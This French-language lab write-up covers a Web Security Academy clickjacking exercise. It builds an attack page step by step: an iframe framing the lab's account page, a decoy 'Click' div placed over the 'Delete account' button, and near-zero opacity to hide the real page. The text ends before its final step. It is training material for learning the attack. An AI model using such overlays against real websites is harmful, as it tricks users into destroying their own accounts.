Clickjacking basique avec protection CSRF

Basic clickjacking with CSRF token protection

Lab: Basic clickjacking with CSRF token protection | Web Security AcademyWebSecAcademy

Ce laboratoire contient une fonctionnalité de connexion ainsi qu’un bouton Delete account protégé par un jeton CSRF. L’objectif est d’inciter l’utilisateur à cliquer sur un élément affichant le mot « Click » sur un site leurre, de manière à supprimer son compte.

Identifiants fournis :

wiener : peter

Sur la page du compte, on trouve la fonction Delete account.

L’idée est d’utiliser une balise <iframe> pour intégrer cette page dans notre propre site et tromper l’utilisateur en lui faisant cliquer au bon endroit.

<style>
iframe{
width: 500px;
height: 600px;
}
</style>
<iframe src ="https://0aff004103a38073e5623c7500bd0041.web-security-academy.net/my-account"</iframe>

Cette étape permet d’afficher la page cible dans notre propre site.

On place un texte trompeur (« Click ») exactement au-dessus du bouton Delete account :

<style>
iframe{
width: 500px;
height: 600px;
}
div{
position: relative;
top: 505px;
left: 70px;
}

</style>
<div>Click</div>
<iframe src ="https://0aff004103a38073e5623c7500bd0041.web-security-academy.net/my-account"</iframe>

Pour que la victime ne voie pas l’interface réelle, on réduit la transparence de l’iframe :

<style>
iframe{
width: 500px;
height: 600px;
opacity: 0.01;
}
div{
position: relative;
top: 505px;
left: 70px;
}

</style>
<div>Click</div>
<iframe src ="https://0aff004103a38073e5623c7500bd0041.web-security-academy.net/my-account"</iframe>

Si le fond de la page ne s’affiche pas, c’est probablement dû à l’absence du paramètre frameborder="0" ou à une politique de sécurité du site. On peut ajuster l’apparence ainsi :

Mis à jour il y a 4 mois

hashtagBasic clickjacking with CSRF token protection

Basic clickjacking with CSRF token protection